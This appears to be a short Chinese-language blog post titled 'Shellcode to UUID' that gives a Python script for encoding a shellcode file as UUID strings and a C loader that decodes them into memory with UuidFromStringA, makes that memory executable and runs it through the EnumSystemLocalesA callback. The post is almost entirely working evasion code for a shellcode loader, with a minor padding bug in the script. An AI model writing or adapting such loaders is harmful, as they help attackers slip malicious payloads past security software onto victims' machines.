Shellcode to UUID

前几天的推：https://twitter.com/ajpc500/status/1353403938414993408?s=09

思路很奇特，重点是在滥用API上

Py Script

import uuid

# read shellcode
shellcode = ""
with open("shellcode.bin", "rb") as f:
    shellcode = f.read()
align_len = (int((len(shellcode) - 1) / 16) + 1) * 16
shellcode.ljust(align_len, b'\x90')
count = int(len(shellcode) / 16)

# generate uuid
uuid_list = []
for i in range(0, count):
    uuid_bytes = shellcode[i * 16 : (i + 1) * 16]
    uuid_list.append(str(uuid.UUID(bytes_le=uuid_bytes)))

# write file format char *[]
with open("shellcode_uuid.txt", "wt", encoding="utf-8") as f:
    f.write("const char *shellcode_uuid[] = { \n")
    for i in range(0, len(uuid_list)):
        if i % 2 == 0:
            f.write("\t")
        f.write("\"" + uuid_list[i] + "\"")
        if i != len(uuid_list) - 1:
            f.write(", ")
        if i % 2 == 1 and i != len(uuid_list) - 1:
            f.write(" \\\n")
    f.write(" \n};")
print("done...")

Example

#include <Windows.h>
#include <rpcdce.h>

#pragma comment(lib, "Rpcrt4.lib")

const char *shellcode_uuid[] = {
    // shellcode uuids...
}

int main(void)
{
    void *buf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // write shellcode to buffer
    size_t uuid_count = sizeof(shellcode_uuid) / sizeof(shellcode_uuid[0]);
    BYTE *ptr = (BYTE *)buf;
    for(size_t i = 0; i < uuid_count; i++, ptr += 16) {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)shellcode_uuid[i], (UUID *)ptr);
        if(status != RPC_S_OK) {
            exit(-1);
        }
    }

    DWORD old_protect;
    VirtualProtect(buf, 0x1000, PAGE_EXECUTE_READ, &old_protect);

    // ((void (*)())buf)();
    
    EnumSystemLocalesA((LOCALE_ENUMPROCA)buf, 0);

    VirtualFree(buf, 0, MEM_RELEASE);
    
    system("pause");
    return 0;
}